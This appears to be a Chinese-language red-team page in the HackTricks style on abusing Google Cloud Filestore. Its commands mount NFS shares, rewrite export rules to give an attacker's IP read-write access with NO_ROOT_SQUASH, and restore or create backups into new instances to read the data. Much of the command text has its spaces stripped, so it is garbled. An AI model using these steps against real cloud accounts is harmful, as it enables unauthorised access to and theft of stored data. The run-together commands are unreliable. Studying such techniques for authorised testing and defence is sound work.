sudoapt-getupdatesudoapt-getinstallnfs-common# Check the share nameshowmount-e<IP># Mount the sharemkdir/mnt/fssudomount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
如果攻击者不在具有对共享访问权限的 IP 地址中,但您有足够的权限对其进行修改,可以移除限制或访问权限。还可以授予您的 IP 地址更多特权,以便在共享上具有管理员访问权限:
gcloudfilestoreinstancesupdatenfstest \--zone=<exact-zone> \--flags-file=nfs.json# Contents of nfs.json{"--file-share":{"capacity":"1024","name":"<share-name>","nfs-export-options": [{"access-mode":"READ_WRITE","ip-ranges": ["<your-ip-private-address>/32"],"squash-mode":"NO_ROOT_SQUASH","anon_uid":1003,"anon_gid":1003}]}}
恢复备份
如果有备份,可以将其恢复到现有实例或新实例中,使其信息变得可访问:
# Create a new filestore if you don't want to modify the old onegcloudfilestoreinstancescreate<new-instance-name> \--zone=<zone> \--tier=STANDARD \--file-share=name=vol1,capacity=1TB \--network=name=default,reserved-ip-range=10.0.0.0/29# Restore a backups in a new instancegcloudfilestoreinstancesrestore<new-instance-name> \--zone=<zone> \--file-share=<instance-file-share-name> \--source-backup=<backup-name> \--source-backup-region=<backup-region># Follow the previous section commands to mount it
创建备份并恢复
如果您无法访问共享并且不想修改它,可以像之前提到的那样对其进行备份,然后恢复:
# Create share backupgcloudfilestorebackupscreate<back-name> \--region=<region> \--instance=<instance-name> \--instance-zone=<instance-zone> \--file-share=<share-name># Follow the previous section commands to restore it and mount it
HackTricks培训AWS红队专家(ARTE)
HackTricks培训GCP红队专家(GRTE)